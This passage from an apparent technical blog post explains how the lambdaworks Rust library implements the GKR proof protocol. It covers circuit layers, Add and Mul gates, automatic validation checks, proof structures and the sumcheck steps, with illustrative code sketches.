&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              layers: Vec&amp;lt;CircuitLayer&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              &#x2F;&#x2F;&#x2F; Number of inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              num_inputs: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              input_num_vars: usize, &#x2F;&#x2F; log2 of number of inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `CircuitLayer` — contains a vector of gates and the number of variables needed to index those gates.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          pub struct CircuitLayer {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              pub gates: Vec&amp;lt;Gate&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              pub num_of_vars: usize, &#x2F;&#x2F; log2 of number of gates in this layer&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `Gate` — a single gate, with its type and input indices.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `GateType` — either `Add` or `Mul`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;circuit-gates&quot;&gt;Circuit Gates&lt;&#x2F;h3&gt;
&lt;p&gt;Each gate in the circuit is either an addition (&lt;code&gt;Add&lt;&#x2F;code&gt;) or multiplication (&lt;code&gt;Mul&lt;&#x2F;code&gt;) gate. The gate type determines how the outputs from the previous layer are combined:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `Add`: The gate outputs the sum of its two input wires.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `Mul`: The gate outputs the product of its two input wires.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For example:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let gate_1 = Gate::new(GateType::Mul, [0, 1]); &#x2F;&#x2F;Multiplies outputs at indices 0 and 1 from the previous layer.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let gate_2 = Gate::new(GateType::Add, [2, 3]); &#x2F;&#x2F; Adds outputs at indices 2 and 3 from the previous layer.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SkRvRAjIlx.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;example-the-blog-post-circuit&quot;&gt;Example: The Blog Post Circuit&lt;&#x2F;h3&gt;
&lt;p&gt;To illustrate this, let’s walk through the construction of the exact circuit used in our &lt;a href=&quot;&#x2F;gkr-protocol-a-step-by-step-example&#x2F;&quot;&gt;step-by-step GKR blog post&lt;&#x2F;a&gt;. This is available as &lt;code&gt;lambda_post_circuit()&lt;&#x2F;code&gt; in the codebase, and you can use it directly or as a template for your circuits.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn lambda_post_circuit() -&amp;gt; Result&amp;lt;Circuit, CircuitError&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    use crate::circuit::{Circuit, CircuitLayer, Gate, GateType};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Circuit::new(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        vec![&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Layer 0 (output layer): Two gates&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            CircuitLayer::new(vec![&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Gate::new(GateType::Mul, [0, 1]), &#x2F;&#x2F; Multiplies outputs 0 and 1 from previous layer&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Gate::new(GateType::Add, [2, 3]), &#x2F;&#x2F; Adds outputs 2 and 3 from previous layer&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            ]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Layer 1: Four gates&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            CircuitLayer::new(vec![&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Gate::new(GateType::Mul, [0, 1]), &#x2F;&#x2F; Multiplies the two inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Gate::new(GateType::Add, [0, 0]), &#x2F;&#x2F; Adds the first input to itself&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Gate::new(GateType::Add, [0, 1]), &#x2F;&#x2F; Adds both inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Gate::new(GateType::Mul, [0, 1]), &#x2F;&#x2F; Multiplies the two inputs again&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            ]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        2, &#x2F;&#x2F; Two inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;how-to-build-your-circuit&quot;&gt;How to Build Your Circuit&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Decide the number of inputs.** Each input will be referenced by its index (starting from 0).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. **Build the first layer:** Each gate in the first layer operates on the inputs. Use `Gate::new(GateType::Add, [i, j])` or `Gate::new(GateType::Mul, [i, j])` to add or multiply input indices `i` and `j`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. **Build subsequent layers:** Each gate operates on outputs from the previous layer. Indices always refer to the order of outputs of the prior layer. Each new layer should be inserted at the beginning of the `layers` vector, since layers are ordered from the top (output layers) to the bottom of the circuit.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. **Repeat until you reach the output layer.**&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. **Wrap your layers in a `Circuit::new(layers, num_inputs)` call.**&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;Important:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Each layer must have a power-of-two number of gates.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Indices must be valid (i.e., not out of bounds for the previous layer).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;circuit-automatic-validation&quot;&gt;Circuit Automatic Validation&lt;&#x2F;h3&gt;
&lt;p&gt;When you construct a &lt;code&gt;Circuit&lt;&#x2F;code&gt;, several checks are performed automatically to ensure the circuit is well-formed:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Power-of-two gates** : Each layer must have a number of gates that is a power of two. This is required for the protocol to work efficiently.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Valid input indices** : Each gate&amp;#39;s input indices must refer to valid outputs from the previous layer. If an index is out of bounds, the construction fails.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Power-of-two inputs** : The number of circuit inputs must also be a power of two.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If any of these conditions are not met, the constructor returns a descriptive error (as a &lt;code&gt;Result::Err&lt;&#x2F;code&gt;). This prevents invalid circuits from being created and helps catch mistakes early in development.&lt;&#x2F;p&gt;
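&lt;p&gt;As a rough sketch of what these checks amount to (the code below is illustrative; the actual lambdaworks types and error variants differ), the constructor logic is essentially:&lt;&#x2F;p&gt;

```rust
/// Illustrative sketch of the well-formedness checks done at construction.
/// Each layer is represented here only by its gates' input index pairs;
/// layers are ordered from the output layer (first) downwards.
#[derive(Debug, PartialEq)]
enum CircuitError {
    NotPowerOfTwo,
    IndexOutOfBounds,
}

fn validate(layers: &[Vec<[usize; 2]>], num_inputs: usize) -> Result<(), CircuitError> {
    // The number of circuit inputs must be a power of two.
    if !num_inputs.is_power_of_two() {
        return Err(CircuitError::NotPowerOfTwo);
    }
    for (i, layer) in layers.iter().enumerate() {
        // Each layer must have a power-of-two number of gates.
        if !layer.len().is_power_of_two() {
            return Err(CircuitError::NotPowerOfTwo);
        }
        // Gate inputs index into the layer below (or the inputs, for the last layer).
        let prev_size = layers.get(i + 1).map_or(num_inputs, |below| below.len());
        if layer.iter().flatten().any(|&idx| idx >= prev_size) {
            return Err(CircuitError::IndexOutOfBounds);
        }
    }
    Ok(())
}
```

&lt;p&gt;Running it on the layers of the example circuit above with two inputs succeeds, while an out-of-range gate index or a three-gate layer is rejected with the corresponding error.&lt;&#x2F;p&gt;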
&lt;h2 id=&quot;the-gkr-protocol&quot;&gt;The GKR Protocol&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s see how each step of the protocol is implemented in our code. We aim to demonstrate how it leverages the sumcheck protocol to recursively reduce a claim about the correctness of a computation at one layer of a circuit to a claim about the next layer, progressing from the output layer down to the input layer.&lt;&#x2F;p&gt;
&lt;p&gt;Recall that in our implementation, we utilize the Fiat-Shamir transform to render the protocol non-interactive, which results in a slightly different appearance from the version described in the previous post.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;prover&quot;&gt;Prover&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;the-proof-structure&quot;&gt;The proof structure&lt;&#x2F;h4&gt;
&lt;p&gt;The prover is responsible for evaluating the circuit and constructing a proof that convinces the verifier of the correctness of this evaluation. The core logic for the prover resides in &lt;code&gt;prover.rs&lt;&#x2F;code&gt;, where you can find the struct &lt;code&gt;GKRProof&lt;&#x2F;code&gt; that consists of:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The input and the output values of the circuit.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * A sumcheck proof for each circuit layer having: &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * The round univariate polynomials $g_j$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * The composition of the univariate polynomial $q$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let’s recall what the polynomials $g_j$ and $q$ are. In each circuit layer and for each round $j$ of its sumcheck, the prover has to compute the univariate polynomial $g_j$ by fixing the variables of the previous rounds to the sampled challenges, leaving the $j$-th variable free, and summing over all the remaining ones. For example, in our previous post, in the layer $0$, the sumcheck had four rounds leading to these polynomials:&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{align}&lt;br &#x2F;&gt;
g_1 (z) &amp;amp;= \sum_{(b_2, c_1, c_2) \in \{0, 1\}^3} \tilde f_{ r_0 }^{ (0) } (z, b_2, c_1, c_2), \newline&lt;br &#x2F;&gt;
g_2 (z) &amp;amp;= \sum_{(c_1, c_2) \in \{0, 1\}^2} \tilde f_{ r_0 }^{ (0) } (s_1, z, c_1, c_2), \newline&lt;br &#x2F;&gt;
g_3 (z) &amp;amp;= \sum_{c_2 \in \{0, 1\}} \tilde f_{ r_0 }^{ (0) } (s_1, s_2, z, c_2), \newline&lt;br &#x2F;&gt;
g_4 (z) &amp;amp;= \tilde f_{ r_0 }^{ (0) } (s_1, s_2, s_3, z),&lt;br &#x2F;&gt;
\end{align}$$&lt;&#x2F;p&gt;
&lt;p&gt;where $s_j$ are random challenges.&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, for each layer $i$, the polynomial $q$ is the composition $q = \tilde W_{i + 1} \circ \ell$, where $\tilde W_{i + 1}$ is the multilinear polynomial extension of the function that maps a node’s position to its actual value, and $\ell$ is the line that goes from $b^\star$ to $c^\star$. In the previous example, $\ell (0) = (s_1, s_2)$ and $\ell (1) = (s_3, s_4)$.&lt;&#x2F;p&gt;
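&lt;p&gt;Concretely, $\ell$ is the componentwise affine interpolation $\ell(t) = b^\star + t \cdot (c^\star - b^\star)$, so that $\ell(0) = b^\star$ and $\ell(1) = c^\star$. A minimal sketch, written over plain integers for readability (the protocol works over field elements):&lt;&#x2F;p&gt;

```rust
/// Evaluate the line through b_star (at t = 0) and c_star (at t = 1),
/// componentwise: ell(t) = b_star + t * (c_star - b_star).
fn line_through(b_star: &[i64], c_star: &[i64], t: i64) -> Vec<i64> {
    b_star
        .iter()
        .zip(c_star.iter())
        .map(|(b, c)| b + t * (c - b))
        .collect()
}
```

&lt;p&gt;Composing $\tilde W_{i + 1}$ with this line then yields the univariate polynomial $q$.&lt;&#x2F;p&gt;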
&lt;p&gt;In the codebase, you’ll see it as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct GKRProof&amp;lt;F: IsField&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub input_values: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub output_values: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub layer_proofs: Vec&amp;lt;LayerProof&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The proof for each circuit layer is:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct LayerProof&amp;lt;F: IsField&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub sumcheck_proof: GKRSumcheckProof&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub poly_q: Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Finally, the &lt;code&gt;sumcheck_proof&lt;&#x2F;code&gt; contains the round polynomials $g_j$ and the challenges used in those rounds, so that both prover and verifier can calculate the line $\ell$.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct GKRSumcheckProof&amp;lt;F: IsField&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub round_polynomials: Vec&amp;lt;Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub challenges: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;building-the-proof&quot;&gt;Building the proof&lt;&#x2F;h4&gt;
&lt;p&gt;The prover constructs the proof using the &lt;code&gt;Prover::generate_proof()&lt;&#x2F;code&gt; method. This function takes the circuit and its inputs, evaluates the circuit on them, and generates the proof. Let’s break down this function into the following steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Circuit Evaluation:** The Prover evaluates the whole circuit in the given inputs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           let evaluation = circuit.evaluate(input);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. **Transcript Initialization** :&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Since we implemented the non-interactive version of the protocol, the prover must &lt;strong&gt;commit to the circuit, its inputs, and its outputs&lt;&#x2F;strong&gt;. This is done by defining a &lt;code&gt;DefaultTranscript&lt;&#x2F;code&gt;, from which we can commit to and sample new values. Both prover and verifier append this data to the transcript. To append the circuit, they need to convert it into bytes, and they do so using the function &lt;code&gt;circuit_to_bytes()&lt;&#x2F;code&gt; that you can find in the file &lt;code&gt;lib.rs&lt;&#x2F;code&gt;. We’ll see more about the transcript later on in the Fiat-Shamir subsection.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. **Sample $r_0$** :  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The prover samples the first challenge $r_0$ to fix the variable $a$ and begin the sumcheck. Recall that the variable $a$ may consist of more than one bit, so $r_0$ has the same size as $a$; this size is called $k_0$ in the code.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           let k_0 = circuit.num_vars_at(0).ok_or(ProverError::CircuitError)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           let mut r_i: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt; = (0..k_0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               .map(|_| transcript.sample_field_element())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. **Sumcheck layer iteration:** For each layer, the prover applies the sumcheck protocol following these steps:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Building the function** :  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The prover builds the function to which he wants to apply the sumcheck,&lt;br &#x2F;&gt;
$$\tilde f_{ r_i } (b, c) = \widetilde{\text{add_i}} (r_i, b, c) \cdot (\widetilde W_{i + 1}(b) + \widetilde W_{i + 1}(c)) + \widetilde{\text{mul_i}} (r_i, b, c) \cdot (\widetilde{W_{i + 1}} (b) \cdot \widetilde{W_{i + 1}} (c)),$$&lt;br &#x2F;&gt;
using the method &lt;code&gt;Prover::build_gkr_polynomial()&lt;&#x2F;code&gt;. Note that this method returns two terms instead of just one. More specifically, it returns a 2-item vector whose elements are themselves vectors of two multilinear polynomials:&lt;br &#x2F;&gt;
First term or vector:&lt;br &#x2F;&gt;
$$[\widetilde{\text{add_i}} (r_i, b, c), \widetilde{W_{i + 1}} (b) + \widetilde{W_{i + 1}} (c)]$$&lt;br &#x2F;&gt;
Second term or vector:&lt;br &#x2F;&gt;
$$[\widetilde{\text{mul_i}} (r_i, b, c), \widetilde{W_{i + 1}} (b) \cdot \widetilde{W_{i + 1}} (c)]$$&lt;&#x2F;p&gt;
&lt;p&gt;This is necessary because the sumcheck implementation at lambdaworks only accepts a product of multilinear polynomials. That is why we separate our polynomial $\tilde f_{r_i}$ into two terms of products of multilinear polynomials.&lt;&#x2F;p&gt;
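As a toy illustration of why the split is harmless, the snippet below evaluates both terms at a hypothetical point and checks that their sum equals the direct evaluation of $\tilde f_{r_i}$. The field $\mathbb{F}_{97}$ and all values are invented for the example; this is not the lambdaworks API.

```rust
// Toy check (prime field F_97, values chosen arbitrarily) that splitting
//   f(b, c) = add~ * (W(b) + W(c)) + mul~ * (W(b) * W(c))
// into two products of factors and summing them back reproduces the
// original polynomial's value.
const P: u64 = 97;

fn fadd(a: u64, b: u64) -> u64 { (a + b) % P }
fn fmul(a: u64, b: u64) -> u64 { (a * b) % P }

// Each term is a list of factors; its value is the product of the factors.
fn eval_term(factors: &[u64]) -> u64 {
    factors.iter().fold(1, |acc, &f| fmul(acc, f))
}

fn main() {
    // Hypothetical evaluations at some point (b, c):
    let (add_eval, mul_eval) = (13, 7); // wiring predicates add~, mul~
    let (w_b, w_c) = (21, 34);          // W~_{i+1}(b), W~_{i+1}(c)

    let term_1 = [add_eval, fadd(w_b, w_c)]; // add~ * (W(b) + W(c))
    let term_2 = [mul_eval, fmul(w_b, w_c)]; // mul~ * (W(b) * W(c))

    let split_sum = fadd(eval_term(&term_1), eval_term(&term_2));
    let direct = fadd(
        fmul(add_eval, fadd(w_b, w_c)),
        fmul(mul_eval, fmul(w_b, w_c)),
    );
    assert_eq!(split_sum, direct); // the split loses nothing
}
```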
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let gkr_poly_terms =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                     Prover::build_gkr_polynomial(circuit, &amp;amp;r_i, w_next_evals, layer_idx)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Apply the GKR Sumcheck Prover:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We use a sumcheck implementation specifically designed for the GKR protocol. We’ll go into more detail about this new sumcheck later, but there are three &lt;strong&gt;key changes&lt;&#x2F;strong&gt; to keep in mind:&lt;br &#x2F;&gt;
&lt;strong&gt;I)&lt;&#x2F;strong&gt; We need a sumcheck prover that &lt;strong&gt;takes a transcript as input&lt;&#x2F;strong&gt; , so we can maintain the same transcript for both the prover and the verifier, which is created at the start.&lt;br &#x2F;&gt;
&lt;strong&gt;II)&lt;&#x2F;strong&gt; This new sumcheck also &lt;strong&gt;returns the random values sampled during execution&lt;&#x2F;strong&gt;. This allows both the prover and verifier to compute the function $\ell$ later, which depends on those values.&lt;br &#x2F;&gt;
